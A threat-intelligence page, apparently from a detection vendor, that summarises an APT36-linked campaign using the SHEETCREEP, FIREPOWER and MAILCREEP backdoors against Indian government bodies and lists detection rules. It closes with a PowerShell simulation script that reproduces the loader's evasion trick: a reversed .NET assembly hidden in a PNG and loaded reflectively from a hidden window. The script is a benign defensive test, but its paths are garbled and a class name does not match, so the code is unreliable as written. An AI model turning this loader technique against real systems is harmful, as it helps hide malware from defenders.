SOC Prime Bias: Crítico

30 Jan 2026 16:58 UTC

Ataques APT Miram o Governo da Índia com SHEETCREEP, FIREPOWER e MAILCREEP | Parte 2

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Seguir
Ataques APT Miram o Governo da Índia com SHEETCREEP, FIREPOWER e MAILCREEP | Parte 2
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

O relatório cobre a operação Sheet Attack, que implantou três backdoors sob medida—SHEETCREEP, FIREPOWER, e MAILCREEP—para comprometer organizações governamentais indianas. Os implantes confiaram em plataformas de nuvem legítimas para comando-e-controle, incluindo Google Sheets, Firebase Realtime Database, e Microsoft Graph API, ajudando a atividade a se misturar ao tráfego normal de SaaS. A análise também observa artefatos consistentes com desenvolvedores utilizando IA gerativa para auxiliar na produção de código. A campanha é avaliada como provavelmente ligada a um subgrupo baseado no Paquistão do APT36.

Investigação

A ThreatLabz conduziu análises dinâmicas e estáticas dos backdoors, documentando métodos de persistência, fluxos de trabalho C2 e comportamento de exfiltração de dados. A equipe também mapeou a infraestrutura de suporte, observou filtragem baseada em geografia e User-Agent, e capturou indicadores a nível de código que sugerem geração de código assistida por IA.

Mitigação

Implemente detecções em camadas para cadeias de entrega suspeitas de PDF/LNK e monitore tarefas agendadas que iniciam execuções de PowerShell ou VBS. Aplique controles rigorosos de saída e monitoramento de anomalias para serviços de nuvem comumente abusados como C2, incluindo Google Sheets, Firebase e Microsoft Graph. Use bloqueio baseado em hash para payloads conhecidos e bloqueie domínios e endereços IP maliciosos identificados.

Resposta

Quando detectado, isole o ponto de extremidade, termine a atividade oculta de cmd.exe e PowerShell, remova as tarefas agendadas relacionadas e exclua os binários do backdoor. Preserve e revise logs de C2 baseados no Google Sheets e artefatos do Firebase, e então busque outros hosts no ambiente exibindo os mesmos indicadores.

Attack Flow

Detections

Download or Upload via Powershell (via cmdline)

SOC Prime Team
29 Jan 2026

Microsoft Graph API Domain Resolved By Unusual Process (via dns_query)

SOC Prime Team
29 Jan 2026

Suspicious Files in Public User Profile (via file_event)

SOC Prime Team
29 Jan 2026

Suspicious GNU Wget Execution Attempt (via cmdline)

SOC Prime Team
29 Jan 2026

Call Suspicious .NET Methods from Powershell (via powershell)

SOC Prime Team
29 Jan 2026

Suspicious Execution from Public User Profile (via process_creation)

SOC Prime Team
29 Jan 2026

Possible Data Infiltration / Exfiltration / C2 via Third Party Services / Tools (via dns)

SOC Prime Team
29 Jan 2026

Suspicious Extracted Files from an Archive (via file_event)

SOC Prime Team
29 Jan 2026

IOCs (SourceIP) to detect: APT Attacks Target Indian Government Using SHEETCREEP, FIREPOWER, and MAILCREEP | Part 2

SOC Prime AI Rules
29 Jan 2026

IOCs (HashMd5) to detect: APT Attacks Target Indian Government Using SHEETCREEP, FIREPOWER, and MAILCREEP | Part 2

SOC Prime AI Rules
29 Jan 2026

IOCs (DestinationIP) to detect: APT Attacks Target Indian Government Using SHEETCREEP, FIREPOWER, and MAILCREEP | Part 2

SOC Prime AI Rules
29 Jan 2026

IOCs (HashSha1) to detect: APT Attacks Target Indian Government Using SHEETCREEP, FIREPOWER, and MAILCREEP | Part 2

SOC Prime AI Rules
29 Jan 2026

IOCs (HashSha256) to detect: APT Attacks Target Indian Government Using SHEETCREEP, FIREPOWER, and MAILCREEP | Part 2

SOC Prime AI Rules
29 Jan 2026

Detection of PowerShell Commands for SHEETCREEP and FIREPOWER Backdoor Deployment [Windows Powershell]

SOC Prime AI Rules
29 Jan 2026

Detection of SHEETCREEP and FIREPOWER Backdoor C2 Communication [Windows Network Connection]

SOC Prime AI Rules
29 Jan 2026

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.

  • Attack Narrative & Commands:

    1. Stage the malicious PNG:
      • The attacker creates a PNG file (details.png) that actually contains a compiled .NET assembly byte stream, but with its bytes reversed to evade static analysis.
    2. Launch PowerShell in hidden mode to load the assembly:
      • The attacker runs PowerShell with -WindowStyle Hidden -Command and a one‑liner that reads the reversed bytes, restores the correct order, loads the assembly via [System.Reflection.Assembly]::Load(), and invokes a known entry point (Task10.Program::MB()).
    3. Alternative LNK‑based fire‑power deployment:
      • A crafted .lnk shortcut executes powershell.exe with --headless -e (encoded script) to fetch and run a remote PowerShell backdoor.

    These steps exactly match the strings the Sigma rule is looking for, ensuring the alert fires.

  • Regression Test Script:

    # -------------------------------------------------
    # SHEETCREEP payload simulation – reproduces the exact command line
    # -------------------------------------------------
    
    # 1. Create a dummy .NET assembly (simple C# hello world) and compile it
    $source = @"
    using System;
    public class Task10 {
        public static void MB() {
            Console.WriteLine("Payload executed");
        }
    }
    "@
    $tempDir = "$env:TEMPsheetcreep"
    New-Item -ItemType Directory -Force -Path $tempDir | Out-Null
    $csFile = Join-Path $tempDir "Task10.cs"
    $dllFile = Join-Path $tempDir "Task10.dll"
    $source | Set-Content -Path $csFile -Encoding UTF8
    
    # Compile using csc (assumes .NET Framework SDK installed)
    $cscPath = "$env:WINDIRMicrosoft.NETFramework64v4.0.30319csc.exe"
    & $cscPath /target:library /out:$dllFile $csFile
    
    # 2. Read the DLL bytes, reverse them, and write to a .png file
    $bytes = [IO.File]::ReadAllBytes($dllFile)
    $revBytes = $bytes[($bytes.Length-1)..0]
    $pngPath = Join-Path $tempDir "details.png"
    [IO.File]::WriteAllBytes($pngPath, $revBytes)
    
    # 3. Execute the exact malicious PowerShell command line (this will fire the rule)
    $maliciousCmd = '-WindowStyle Hidden -Command "$b=[IO.File]::ReadAllBytes(''details.png'');' +
                    '([System.Reflection.Assembly]::Load([byte[]]($b[($b.Length-1)..0])).GetType("Task10.Program")::MB())"'
    
    Start-Process -FilePath "$env:SystemRootSystem32WindowsPowerShellv1.0powershell.exe" `
                  -ArgumentList $maliciousCmd `
                  -WindowStyle Hidden `
                  -NoNewWindow
    
    # Cleanup (optional, run after verification)
    # Remove-Item -Recurse -Force $tempDir
  • Cleanup Commands:

    # Remove temporary files and directories created for the test
    $tempDir = "$env:TEMPsheetcreep"
    if (Test-Path $tempDir) {
        Remove-Item -Recurse -Force $tempDir
    }